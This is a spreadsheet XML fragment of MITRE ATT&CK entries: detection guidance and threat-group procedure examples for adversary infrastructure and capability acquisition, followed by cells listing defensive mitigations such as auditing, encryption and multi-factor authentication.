[GALLIUM](https://attack.mitre.org/groups/G0093) has used Taiwan-based servers that appear to be exclusive to [GALLIUM](https://attack.mitre.org/groups/G0093).(Citation: Microsoft GALLIUM December 2019)
Kimsuky
[Kimsuky](https://attack.mitre.org/groups/G0094) has purchased hosting servers with virtual currency and prepaid cards.(Citation: KISA Operation Muzabi)
Sandworm Team
[Sandworm Team](https://attack.mitre.org/groups/G0034) has leased servers from resellers instead of leasing infrastructure directly from hosting companies to enable its operations.(Citation: US District Court Indictment GRU Unit 74455 October 2020)
</t>
  </si>
  <si>
    <t xml:space="preserve">Response Content
Once adversaries have provisioned a VPS (ex: for use as a command and control server), internet scans may reveal servers that adversaries have acquired. Consider looking for identifiable patterns such as services listening, certificates in use, SSL/TLS negotiation features, or other response artifacts associated with adversary C2 software.(Citation: ThreatConnect Infrastructure Dec 2020)(Citation: Mandiant SCANdalous Jul 2020)(Citation: Koczwara Beacon Hunting Sep 2021) Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Command and Control.
Response Metadata
Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Command and Control.
Pre-compromise
This technique cannot be easily mitigated with preventive controls since it is based on behaviors performed outside of the scope of enterprise defenses and controls.
Axiom
[Axiom](https://attack.mitre.org/groups/G0001) has used VPS hosting providers in targeting of intended victims.(Citation: Novetta-Axiom)
Dragonfly
[Dragonfly](https://attack.mitre.org/groups/G0035) has acquired VPS infrastructure for use in malicious campaigns.(Citation: Gigamon Berserk Bear October 2021)
HAFNIUM
[HAFNIUM](https://attack.mitre.org/groups/G0125) has operated from leased virtual private servers (VPS) in the United States.(Citation: Microsoft HAFNIUM March 2020)
LAPSUS$
[LAPSUS$](https://attack.mitre.org/groups/G1004) has used VPS hosting providers for infrastructure.(Citation: MSTIC DEV-0537 Mar 2022)
TEMP.Veles
[TEMP.Veles](https://attack.mitre.org/groups/G0088) has used Virtual Private Server (VPS) infrastructure.(Citation: FireEye TRITON 2019)
</t>
  </si>
  <si>
    <t xml:space="preserve">Response Content
Once adversaries leverage the web service as infrastructure (ex: for command and control), it may be possible to look for unique characteristics associated with adversary software, if known.(Citation: ThreatConnect Infrastructure Dec 2020) Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Command and Control ([Web Service](https://attack.mitre.org/techniques/T1102)) or [Exfiltration Over Web Service](https://attack.mitre.org/techniques/T1567).
Pre-compromise
This technique cannot be easily mitigated with preventive controls since it is based on behaviors performed outside of the scope of enterprise defenses and controls.
Operation Dream Job
During [Operation Dream Job](https://attack.mitre.org/campaigns/C0022), [Lazarus Group](https://attack.mitre.org/groups/G0032) used file hosting services like DropBox and OneDrive.(Citation: ClearSky Lazarus Aug 2020)
Operation Sharpshooter
For [Operation Sharpshooter](https://attack.mitre.org/campaigns/C0013), the threat actors used Dropbox to host lure documents and their first-stage downloader.(Citation: McAfee Sharpshooter December 2018)
APT17
[APT17](https://attack.mitre.org/groups/G0025) has created profile pages in Microsoft TechNet that were used as C2 infrastructure.(Citation: FireEye APT17)
APT28
[APT28](https://attack.mitre.org/groups/G0007) has used newly-created Blogspot pages for credential harvesting operations.(Citation: Google TAG Ukraine Threat Landscape March 2022)
APT29
[APT29](https://attack.mitre.org/groups/G0016) has registered algorithmically generated Twitter handles that are used for C2 by malware, such as [HAMMERTOSS](https://attack.mitre.org/software/S0037). [APT29](https://attack.mitre.org/groups/G0016) has also used legitimate web services such as Dropbox and Constant Contact in their operations.(Citation: FireEye APT29)(Citation: MSTIC NOBELIUM May 2021)
APT32
[APT32](https://attack.mitre.org/groups/G0050) has set up Dropbox, Amazon S3, and Google Drive to host malicious downloads.(Citation: Volexity Ocean Lotus November 2020)
Confucius
[Confucius](https://attack.mitre.org/groups/G0142) has obtained cloud storage service accounts to host stolen data.(Citation: TrendMicro Confucius APT Feb 2018)
Earth Lusca
[Earth Lusca](https://attack.mitre.org/groups/G1006) has established GitHub accounts to host their malware.(Citation: TrendMicro EarthLusca 2022)
FIN7
[FIN7](https://attack.mitre.org/groups/G0046) has set up Amazon S3 buckets to host trojanized digital products.(Citation: Mandiant FIN7 Apr 2022)
HAFNIUM
[HAFNIUM](https://attack.mitre.org/groups/G0125) has acquired web services for use in C2 and exfiltration.(Citation: Microsoft HAFNIUM March 2020)
IndigoZebra
[IndigoZebra](https://attack.mitre.org/groups/G0136) created Dropbox accounts for their operations.(Citation: HackerNews IndigoZebra July 2021)(Citation: Checkpoint IndigoZebra July 2021)
Kimsuky
[Kimsuky](https://attack.mitre.org/groups/G0094) has hosted content used for targeting efforts via web services such as Blogspot.(Citation: Talos Kimsuky Nov 2021)
Lazarus Group
[Lazarus Group](https://attack.mitre.org/groups/G0032) has hosted malicious downloads on Github.(Citation: CISA AppleJeus Feb 2021)
LazyScripter
[LazyScripter](https://attack.mitre.org/groups/G0140) has established GitHub accounts to host its toolsets.(Citation: MalwareBytes LazyScripter Feb 2021)
Magic Hound
[Magic Hound](https://attack.mitre.org/groups/G0059) has acquired Amazon S3 buckets to use in C2.(Citation: Check Point APT35 CharmPower January 2022)
MuddyWater
[MuddyWater](https://attack.mitre.org/groups/G0069) has used file sharing services including OneHub to distribute tools.(Citation: Anomali Static Kitten February 2021)(Citation: Trend Micro Muddy Water March 2021)
POLONIUM
[POLONIUM](https://attack.mitre.org/groups/G1005) has created and used legitimate Microsoft OneDrive accounts for their operations.(Citation: Microsoft POLONIUM June 2022)
TA2541
[TA2541](https://attack.mitre.org/groups/G1018) has hosted malicious files on various platforms including Google Drive, OneDrive, Discord, PasteText, ShareText, and GitHub.(Citation: Proofpoint TA2541 February 2022)
Turla
[Turla](https://attack.mitre.org/groups/G0010) has created web accounts including Dropbox and GitHub for C2 and document exfiltration.(Citation: ESET Crutch December 2020)
ZIRCONIUM
[ZIRCONIUM](https://attack.mitre.org/groups/G0128) has used GitHub to host malware linked in spearphishing e-mails.(Citation: Google Election Threats October 2020)(Citation: Zscaler APT31 Covid-19 October 2020)
</t>
  </si>
  <si>
    <t xml:space="preserve">Malware Content
Consider analyzing malware for features that may be associated with the adversary and/or their developers, such as compiler used, debugging artifacts, or code similarities. Malware repositories can also be used to identify additional samples associated with the adversary and identify development patterns over time.
Malware Metadata
Monitor for contextual data about a malicious payload, such as compilation times, file hashes, as well as watermarks or other identifiable configuration information. Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on post-compromise phases of the adversary lifecycle.
Pre-compromise
This technique cannot be easily mitigated with preventive controls since it is based on behaviors performed outside of the scope of enterprise defenses and controls.
C0010
For [C0010](https://attack.mitre.org/campaigns/C0010), UNC3890 actors used unique malware, including [SUGARUSH](https://attack.mitre.org/software/S1049) and [SUGARDUMP](https://attack.mitre.org/software/S1042).(Citation: Mandiant UNC3890 Aug 2022)
CostaRicto
For [CostaRicto](https://attack.mitre.org/campaigns/C0004), the threat actors used custom malware, including [PS1](https://attack.mitre.org/software/S0613), [CostaBricks](https://attack.mitre.org/software/S0614), and [SombRAT](https://attack.mitre.org/software/S0615).(Citation: BlackBerry CostaRicto November 2020)
Operation Dream Job
For [Operation Dream Job](https://attack.mitre.org/campaigns/C0022), [Lazarus Group](https://attack.mitre.org/groups/G0032) developed custom tools such as Sumarta, DBLL Dropper, [Torisma](https://attack.mitre.org/software/S0678), and [DRATzarus](https://attack.mitre.org/software/S0694) for their operations.(Citation: ClearSky Lazarus Aug 2020)(Citation: ESET Lazarus Jun 2020)(Citation: McAfee Lazarus Jul 2020)(Citation: McAfee Lazarus Nov 2020)
Operation Ghost
For [Operation Ghost](https://attack.mitre.org/campaigns/C0023), [APT29](https://attack.mitre.org/groups/G0016) used new strains of malware including [FatDuke](https://attack.mitre.org/software/S0512), [MiniDuke](https://attack.mitre.org/software/S0051), [RegDuke](https://attack.mitre.org/software/S0511), and [PolyglotDuke](https://attack.mitre.org/software/S0518).(Citation: ESET Dukes October 2019)
Operation Sharpshooter
For [Operation Sharpshooter](https://attack.mitre.org/campaigns/C0013), the threat actors used the [Rising Sun](https://attack.mitre.org/software/S0448) modular backdoor.(Citation: McAfee Sharpshooter December 2018)
Operation Wocao
During [Operation Wocao](https://attack.mitre.org/campaigns/C0014), threat actors developed their own custom webshells to upload to compromised servers.(Citation: FoxIT Wocao December 2019)
SolarWinds Compromise
For the [SolarWinds Compromise](https://attack.mitre.org/campaigns/C0024), [APT29](https://attack.mitre.org/groups/G0016) used numerous pieces of malware that were likely developed for or by the group, including [SUNBURST](https://attack.mitre.org/software/S0559), [SUNSPOT](https://attack.mitre.org/software/S0562), [Raindrop](https://attack.mitre.org/software/S0565), and [TEARDROP](https://attack.mitre.org/software/S0560).(Citation: FireEye SUNBURST Backdoor December 2020)(Citation: CrowdStrike SUNSPOT Implant January 2021)(Citation: Microsoft Deep Dive Solorigate January 2021) 
APT29
[APT29](https://attack.mitre.org/groups/G0016) has used unique malware in many of their operations.(Citation: F-Secure The Dukes)(Citation: Mandiant No Easy Breach)(Citation: MSTIC Nobelium Toolset May 2021)(Citation: Mandiant APT29 Eye Spy Email Nov 22)
Aoqin Dragon
[Aoqin Dragon](https://attack.mitre.org/groups/G1007) has used custom malware, including [Mongall](https://attack.mitre.org/software/S1026) and [Heyoka Backdoor](https://attack.mitre.org/software/S1027), in their operations.(Citation: SentinelOne Aoqin Dragon June 2022)
Cleaver
[Cleaver](https://attack.mitre.org/groups/G0003) has created customized tools and payloads for functions including ARP poisoning, encryption, credential dumping, ASP.NET shells, web backdoors, process enumeration, WMI querying, HTTP and SMB communications, network interface sniffing, and keystroke logging.(Citation: Cylance Cleaver)
FIN13
[FIN13](https://attack.mitre.org/groups/G1016) has utilized custom malware to maintain persistence in a compromised environment.(Citation: Mandiant FIN13 Aug 2022)(Citation: Sygnia Elephant Beetle Jan 2022)
FIN7
[FIN7](https://attack.mitre.org/groups/G0046) has developed malware for use in operations, including the creation of infected removable media.(Citation: FBI Flash FIN7 USB)(Citation: FireEye FIN7 Oct 2019)
Indrik Spider
[Indrik Spider](https://attack.mitre.org/groups/G0119) has developed malware for their operations, including ransomware such as [BitPaymer](https://attack.mitre.org/software/S0570) and [WastedLocker](https://attack.mitre.org/software/S0612).(Citation: Crowdstrike Indrik November 2018)
Ke3chang
[Ke3chang](https://attack.mitre.org/groups/G0004) has developed custom malware that allowed them to maintain persistence on victim networks.(Citation: Microsoft NICKEL December 2021)
Kimsuky
[Kimsuky](https://attack.mitre.org/groups/G0094) has developed its own unique malware such as MailFetch.py for use in operations.(Citation: KISA Operation Muzabi)(Citation: Talos Kimsuky Nov 2021)
Lazarus Group
[Lazarus Group](https://attack.mitre.org/groups/G0032) has developed custom malware for use in their operations.(Citation: CISA AppleJeus Feb 2021)(Citation: Google TAG Lazarus Jan 2021)
LuminousMoth
[LuminousMoth](https://attack.mitre.org/groups/G1014) has used unique malware for information theft and exfiltration.(Citation: Kaspersky LuminousMoth July 2021)(Citation: Bitdefender LuminousMoth July 2021)
Moses Staff
[Moses Staff](https://attack.mitre.org/groups/G1009) has built malware, such as [DCSrv](https://attack.mitre.org/software/S1033) and [PyDCrypt](https://attack.mitre.org/software/S1032), for targeting victims' machines.(Citation: Checkpoint MosesStaff Nov 2021)
Sandworm Team
[Sandworm Team](https://attack.mitre.org/groups/G0034) has developed malware for its operations, including malicious mobile applications and destructive malware such as [NotPetya](https://attack.mitre.org/software/S0368) and [Olympic Destroyer](https://attack.mitre.org/software/S0365).(Citation: US District Court Indictment GRU Unit 74455 October 2020)
TeamTNT
[TeamTNT](https://attack.mitre.org/groups/G0139) has developed custom malware such as [Hildegard](https://attack.mitre.org/software/S0601).(Citation: Unit 42 Hildegard Malware)
Turla
[Turla](https://attack.mitre.org/groups/G0010) has developed its own unique malware for use in operations.(Citation: Recorded Future Turla Infra 2020)
</t>
  </si>
  <si>
    <t xml:space="preserve">Response Content
If infrastructure or patterns in the malicious web content related to malvertising have been previously identified, internet scanning may uncover when an adversary has staged malicious web content. Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on other phases of the adversary lifecycle, such as [Drive-by Compromise](https://attack.mitre.org/techniques/T1189) or [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203).
Pre-compromise
This technique cannot be easily mitigated with preventive controls since it is based on behaviors performed outside of the scope of enterprise defenses and controls. Efforts should be focused on initial access activities, such as drive by compromise where ad blocking adblockers can help prevent malicious code from executing.
</t>
  </si>
  <si>
    <t xml:space="preserve">Response Content
Consider use of services that may aid in the tracking of certificates in use on sites across the Internet. In some cases it may be possible to pivot on known pieces of certificate information to uncover other adversary infrastructure.(Citation: Splunk Kovar Certificates 2017)
Detection efforts may be focused on related behaviors, such as [Web Protocols](https://attack.mitre.org/techniques/T1071/001) , [Asymmetric Cryptography](https://attack.mitre.org/techniques/T1573/002) , and/or [Install Root Certificate](https://attack.mitre.org/techniques/T1553/004) .
Pre-compromise
This technique cannot be easily mitigated with preventive controls since it is based on behaviors performed outside of the scope of enterprise defenses and controls.
C0011
For [C0011](https://attack.mitre.org/campaigns/C0011), [Transparent Tribe](https://attack.mitre.org/groups/G0134) established SSL certificates on the typo-squatted domains the group registered.(Citation: Cisco Talos Transparent Tribe Education Campaign July 2022)
APT29
[APT29](https://attack.mitre.org/groups/G0016) has created self-signed digital certificates to enable mutual TLS authentication for malware.(Citation: PWC WellMess July 2020)(Citation: PWC WellMess C2 August 2020)
PROMETHIUM
[PROMETHIUM](https://attack.mitre.org/groups/G0056) has created self-signed digital certificates for use in HTTPS C2 traffic.(Citation: Talos Promethium June 2020)
</t>
  </si>
  <si>
    <t xml:space="preserve">Malware Content
Consider analyzing malware for features that may be associated with the adversary and/or their developers, such as compiler used, debugging artifacts, or code similarities. Malware repositories can also be used to identify additional samples associated with the adversary and identify development patterns over time. Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Defense Evasion or Command and Control.
Malware Metadata
Monitor for contextual data about a malicious payload, such as compilation times, file hashes, as well as watermarks or other identifiable configuration information. Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Defense Evasion or Command and Control.
Response Content
Consider use of services that may aid in the tracking of capabilities, such as certificates, in use on sites across the Internet. In some cases it may be possible to pivot on known pieces of information to uncover other adversary infrastructure.(Citation: Splunk Kovar Certificates 2017) Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Defense Evasion or Command and Control.
Pre-compromise
This technique cannot be easily mitigated with preventive controls since it is based on behaviors performed outside of the scope of enterprise defenses and controls.
Kimsuky
[Kimsuky](https://attack.mitre.org/groups/G0094) created and used a mailing toolkit to use in spearphishing attacks.(Citation: VirusBulletin Kimsuky October 2019)
</t>
  </si>
  <si>
    <t xml:space="preserve">Response Content
If infrastructure or patterns in malware, tooling, certificates, or malicious web content have been previously identified, internet scanning may uncover when an adversary has staged their capabilities.
Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as initial access and post-compromise behaviors.
Pre-compromise
This technique cannot be easily mitigated with preventive controls since it is based on behaviors performed outside of the scope of enterprise defenses and controls.
Mustang Panda
[Mustang Panda](https://attack.mitre.org/groups/G0129) has used servers under their control to validate tracking pixels sent to phishing victims.(Citation: Proofpoint TA416 Europe March 2022)
</t>
  </si>
  <si>
    <t xml:space="preserve">Response Content
If infrastructure or patterns in tooling have been previously identified, internet scanning may uncover when an adversary has staged tools to make them accessible for targeting.
Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on post-compromise phases of the adversary lifecycle, such as [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105).
Pre-compromise
This technique cannot be easily mitigated with preventive controls since it is based on behaviors performed outside of the scope of enterprise defenses and controls.
C0010
For [C0010](https://attack.mitre.org/campaigns/C0010), UNC3890 actors staged tools on their infrastructure to download directly onto a compromised system.(Citation: Mandiant UNC3890 Aug 2022)
Operation Dream Job
For [Operation Dream Job](https://attack.mitre.org/campaigns/C0022), [Lazarus Group](https://attack.mitre.org/groups/G0032) used multiple servers to host malicious tools.(Citation: ESET Lazarus Jun 2020)
Threat Group-3390
[Threat Group-3390](https://attack.mitre.org/groups/G0027) has staged tools, including [gsecdump](https://attack.mitre.org/software/S0008) and WCE, on previously compromised websites.(Citation: Dell TG-3390)
</t>
  </si>
  <si>
    <t xml:space="preserve">Response Content
If infrastructure or patterns in malware have been previously identified, internet scanning may uncover when an adversary has staged malware to make it accessible for targeting.
Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on post-compromise phases of the adversary lifecycle, such as [User Execution](https://attack.mitre.org/techniques/T1204) or [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105) .
Pre-compromise
This technique cannot be easily mitigated with preventive controls since it is based on behaviors performed outside of the scope of enterprise defenses and controls.
C0010
For [C0010](https://attack.mitre.org/campaigns/C0010), UNC3890 actors staged malware on their infrastructure for direct download onto a compromised system.(Citation: Mandiant UNC3890 Aug 2022) 
C0011
For [C0011](https://attack.mitre.org/campaigns/C0011), [Transparent Tribe](https://attack.mitre.org/groups/G0134) hosted malicious documents on domains registered by the group.(Citation: Cisco Talos Transparent Tribe Education Campaign July 2022) 
C0021
For [C0021](https://attack.mitre.org/campaigns/C0021), the threat actors uploaded malware to websites under their control.(Citation: FireEye APT29 Nov 2018)(Citation: Microsoft Unidentified Dec 2018)
Night Dragon
During [Night Dragon](https://attack.mitre.org/campaigns/C0002), threat actors uploaded commonly available hacker tools to compromised web servers.(Citation: McAfee Night Dragon)
Operation Dream Job
For [Operation Dream Job](https://attack.mitre.org/campaigns/C0022), [Lazarus Group](https://attack.mitre.org/groups/G0032) used compromised servers to host malware.(Citation: ClearSky Lazarus Aug 2020)(Citation: ESET Lazarus Jun 2020)(Citation: McAfee Lazarus Jul 2020)(Citation: McAfee Lazarus Nov 2020)
Operation Sharpshooter
For [Operation Sharpshooter](https://attack.mitre.org/campaigns/C0013), the threat actors staged malicious files on Dropbox and other websites.(Citation: McAfee Sharpshooter December 2018)
Operation Spalax
For [Operation Spalax](https://attack.mitre.org/campaigns/C0005), the threat actors staged malware and malicious files in legitimate hosting services such as OneDrive or MediaFire.(Citation: ESET Operation Spalax Jan 2021)
APT32
[APT32](https://attack.mitre.org/groups/G0050) has hosted malicious payloads in Dropbox, Amazon S3, and Google Drive for use during targeting.(Citation: Volexity Ocean Lotus November 2020)
BITTER
[BITTER](https://attack.mitre.org/groups/G1002) has registered domains to stage payloads.(Citation: Forcepoint BITTER Pakistan Oct 2016)
EXOTIC LILY
[EXOTIC LILY](https://attack.mitre.org/groups/G1011)  has uploaded malicious payloads to file-sharing services including TransferNow, TransferXL, WeTransfer, and OneDrive.(Citation: Google EXOTIC LILY March 2022)
Earth Lusca
[Earth Lusca](https://attack.mitre.org/groups/G1006) has staged malware and malicious files on compromised web servers, GitHub, and Google Drive.(Citation: TrendMicro EarthLusca 2022)
FIN7
[FIN7](https://attack.mitre.org/groups/G0046) has staged legitimate software, that was trojanized to contain an Atera agent installer, on Amazon S3.(Citation: Mandiant FIN7 Apr 2022)
Gamaredon Group
[Gamaredon Group](https://attack.mitre.org/groups/G0047) has registered domains to stage payloads.(Citation: Microsoft Actinium February 2022)(Citation: Unit 42 Gamaredon February 2022)
HEXANE
[HEXANE](https://attack.mitre.org/groups/G1001) has staged malware on fraudulent websites set up to impersonate targeted organizations.(Citation: ClearSky Siamesekitten August 2021)
Kimsuky
[Kimsuky](https://attack.mitre.org/groups/G0094) has used Blogspot to host malicious content such as beacons, file exfiltrators, and implants.(Citation: Talos Kimsuky Nov 2021)
LazyScripter
[LazyScripter](https://attack.mitre.org/groups/G0140) has hosted open-source remote access Trojans used in its operations in GitHub.(Citation: MalwareBytes LazyScripter Feb 2021)
LuminousMoth
[LuminousMoth](https://attack.mitre.org/groups/G1014) has hosted malicious payloads on Dropbox.(Citation: Kaspersky LuminousMoth July 2021)
Mustang Panda
[Mustang Panda](https://attack.mitre.org/groups/G0129) has hosted malicious payloads on DropBox including [PlugX](https://attack.mitre.org/software/S0013).(Citation: Proofpoint TA416 Europe March 2022)
SideCopy
[SideCopy](https://attack.mitre.org/groups/G1008) has used compromised domains to host its malicious payloads.(Citation: MalwareBytes SideCopy Dec 2021)
TA2541
[TA2541](https://attack.mitre.org/groups/G1018) has uploaded malware to various platforms including Google Drive, Pastetext, Sharetext, and GitHub.(Citation: Proofpoint TA2541 February 2022)(Citation: Cisco Operation Layover September 2021)
TA505
[TA505](https://attack.mitre.org/groups/G0092) has staged malware on actor-controlled domains.(Citation: Korean FSI TA505 2020)
TeamTNT
[TeamTNT](https://attack.mitre.org/groups/G0139) has uploaded backdoored Docker images to Docker Hub.(Citation: Lacework TeamTNT May 2021)
Threat Group-3390
[Threat Group-3390](https://attack.mitre.org/groups/G0027) has hosted malicious payloads on Dropbox.(Citation: Trend Micro DRBControl February 2020)
</t>
  </si>
  <si>
    <t xml:space="preserve">Certificate Registration
Consider use of services that may aid in the tracking of newly issued certificates and/or certificates in use on sites across the Internet. In some cases it may be possible to pivot on known pieces of certificate information to uncover other adversary infrastructure.(Citation: Splunk Kovar Certificates 2017) Some server-side components of adversary tools may have default values set for SSL/TLS certificates.(Citation: Recorded Future Beacon Certificates) Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Defense Evasion or Command and Control.
Malware Content
Consider analyzing malware for features that may be associated with malware providers, such as compiler used, debugging artifacts, code similarities, or even group identifiers associated with specific Malware-as-a-Service (MaaS) offerings. Malware repositories can also be used to identify additional samples associated with the developers and the adversary utilizing their services. Identifying overlaps in malware use by different adversaries may indicate malware was obtained by the adversary rather than developed by them. In some cases, identifying overlapping characteristics in malware used by different adversaries may point to a shared quartermaster.(Citation: FireEyeSupplyChain) Malware repositories can also be used to identify features of tool use associated with an adversary, such as watermarks in [Cobalt Strike](https://attack.mitre.org/software/S0154) payloads.(Citation: Analyzing CS Dec 2020)
Malware Metadata
Monitor for contextual data about a malicious payload, such as compilation times, file hashes, as well as watermarks or other identifiable configuration information. Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Defense Evasion or Command and Control.
Response Content
Monitor for logged network traffic in response to a scan showing both protocol header and body values that may buy and/or steal capabilities that can be used during targeting. Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Defense Evasion or Command and Control.
Pre-compromise
This technique cannot be easily mitigated with preventive controls since it is based on behaviors performed outside of the scope of enterprise defenses and controls.
</t>
  </si>
  <si>
    <t xml:space="preserve">Response Content
Once adversaries leverage the abused web service as infrastructure (ex: for command and control), it may be possible to look for unique characteristics associated with adversary software, if known.(Citation: ThreatConnect Infrastructure Dec 2020)
Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Command and Control [Web Service](https://attack.mitre.org/techniques/T1102) or [Exfiltration Over Web Service](https://attack.mitre.org/techniques/T1567) .
Pre-compromise
This technique cannot be easily mitigated with preventive controls since it is based on behaviors performed outside of the scope of enterprise defenses and controls.
Earth Lusca
[Earth Lusca](https://attack.mitre.org/groups/G1006) has compromised Google Drive repositories.(Citation: TrendMicro EarthLusca 2022)
Turla
[Turla](https://attack.mitre.org/groups/G0010) has frequently used compromised WordPress sites for C2 infrastructure.(Citation: Recorded Future Turla Infra 2020)
</t>
  </si>
  <si>
    <t xml:space="preserve">M1047
Audit
Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.
</t>
  </si>
  <si>
    <t xml:space="preserve">M1047
Audit
Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.
M1018
User Account Management
Manage the creation, modification, use, and permissions associated to user accounts.
M1017
User Training
Train users to be aware of access or manipulation attempts by an adversary to reduce the risk of successful spearphishing, social engineering, and other techniques that involve user interaction.
</t>
  </si>
  <si>
    <t xml:space="preserve">M1041
Encrypt Sensitive Information
Protect sensitive information with strong encryption.
M1032
Multi-factor Authentication
Use two or more pieces of evidence to authenticate to a system; such as username and password in addition to a token from a physical smart card or token generator.
</t>
  </si>
  <si>
    <t xml:space="preserve">M1041
Encrypt Sensitive Information
Protect sensitive information with strong encryption.
</t>
  </si>
  <si>
    <t xml:space="preserve">M1047
Audit
Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.
M1042
Disable or Remove Feature or Program
Remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries.
M1041
Encrypt Sensitive Information
Protect sensitive information with strong encryption.
</t>
  </si>
  <si>
    <t xml:space="preserve">M1047
Audit
Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.
M1041
Encrypt Sensitive Information
Protect sensitive information with strong encryption.
M1032
Multi-factor Authentication
Use two or more pieces of evidence to authenticate to a system; such as username and password in addition to a token from a physical smart card or token generator.
</t>
  </si>
  <si>
    <t xml:space="preserve">M1042
Disable or Remove Feature or Program
Remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries.
M1037
Filter Network Traffic
Use network appliances to filter ingress or egress traffic and perform protocol-based filtering. Configure software on endpoints to filter network traffic.
M1031
Network Intrusion Prevention
Use intrusion detection signatures to block traffic at network boundaries.
M1030
Network Segmentation
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t>
  </si>
  <si>
    <t xml:space="preserve">M1042
Disable or Remove Feature or Program
Remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries.
M1041
Encrypt Sensitive Information
Protect sensitive information with strong encryption.
M1037
Filter Network Traffic
Use network appliances to filter ingress or egress traffic and perform protocol-based filtering. Configure software on endpoints to filter network traffic.
M1035
Limit Access to Resource Over Network
Prevent access to file shares, remote access to systems, unnecessary services. Mechanisms to limit access may include use of network concentrators, RDP gateways, etc.
M1031
Network Intrusion Prevention
Use intrusion detection signatures to block traffic at network boundaries.
M1017
User Training
Train users to be aware of access or manipulation attempts by an adversary to reduce the risk of successful spearphishing, social engineering, and other techniques that involve user interaction.
</t>
  </si>
  <si>
    <t xml:space="preserve">M1042
Disable or Remove Feature or Program
Remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries.
M1041
Encrypt Sensitive Information
Protect sensitive information with strong encryption.
M1037
Filter Network Traffic
Use network appliances to filter ingress or egress traffic and perform protocol-based filtering. Configure software on endpoints to filter network traffic.
M1035
Limit Access to Resource Over Network
Prevent access to file shares, remote access to systems, unnecessary services. Mechanisms to limit access may include use of network concentrators, RDP gateways, etc.
M1031
Network Intrusion Prevention
Use intrusion detection signatures to block traffic at network boundaries.
M1030
Network Segmentation
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M1017
User Training
Train users to be aware of access or manipulation attempts by an adversary to reduce the risk of successful spearphishing, social engineering, and other techniques that involve user interaction.
</t>
  </si>
  <si>
    <t xml:space="preserve">M1037
Filter Network Traffic
Use network appliances to filter ingress or egress traffic and perform protocol-based filtering. Configure software on endpoints to filter network traffic.
M1031
Network Intrusion Prevention
Use intrusion detection signatures to block traffic at network boundaries.
</t>
  </si>
  <si>
    <t xml:space="preserve">M1026
Privileged Account Management
Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.
</t>
  </si>
  <si>
    <t xml:space="preserve">M1057
Data Loss Prevention
Use a data loss prevention (DLP) strategy to categorize sensitive data, identify data formats indicative of personal identifiable information (PII), and restrict exfiltration of sensitive data.(Citation: PurpleSec Data Loss Prevention)
</t>
  </si>
  <si>
    <t xml:space="preserve">M1017
User Training
Train users to be aware of access or manipulation attempts by an adversary to reduce the risk of successful spearphishing, social engineering, and other techniques that involve user interaction.
</t>
  </si>
  <si>
    <t xml:space="preserve">M1018
User Account Management
Manage the creation, modification, use, and permissions associated to user accounts.
M1017
User Training
Train users to be aware of access or manipulation attempts by an adversary to reduce the risk of successful spearphishing, social engineering, and other techniques that involve user interaction.
</t>
  </si>
  <si>
    <t xml:space="preserve">M1047
Audit
Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.
M1032
Multi-factor Authentication
Use two or more pieces of evidence to authenticate to a system; such as username and password in addition to a token from a physical smart card or token generator.
M1018
User Account Management
Manage the creation, modification, use, and permissions associated to user accounts.
M1017
User Training
Train users to be aware of access or manipulation attempts by an adversary to reduce the risk of successful spearphishing, social engineering, and other techniques that involve user interaction.
</t>
  </si>
  <si>
    <t xml:space="preserve">M1041
Encrypt Sensitive Information
Protect sensitive information with strong encryption.
M1037
Filter Network Traffic
Use network appliances to filter ingress or egress traffic and perform protocol-based filtering. Configure software on endpoints to filter network traffic.
M1031
Network Intrusion Prevention
Use intrusion detection signatures to block traffic at network boundaries.
M1030
Network Segmentation
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M1054
Software Configuration
Implement configuration changes to software (other than the operating system) to mitigate security risks associated to how the software operates.
M1051
Update Software
Perform regular software updates to mitigate exploitation risk.
</t>
  </si>
  <si>
    <t xml:space="preserve">M1047
Audit
Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.
M1041
Encrypt Sensitive Information
Protect sensitive information with strong encryption.
M1037
Filter Network Traffic
Use network appliances to filter ingress or egress traffic and perform protocol-based filtering. Configure software on endpoints to filter network traffic.
M1032
Multi-factor Authentication
Use two or more pieces of evidence to authenticate to a system; such as username and password in addition to a token from a physical smart card or token generator.
M1022
Restrict File and Directory Permissions
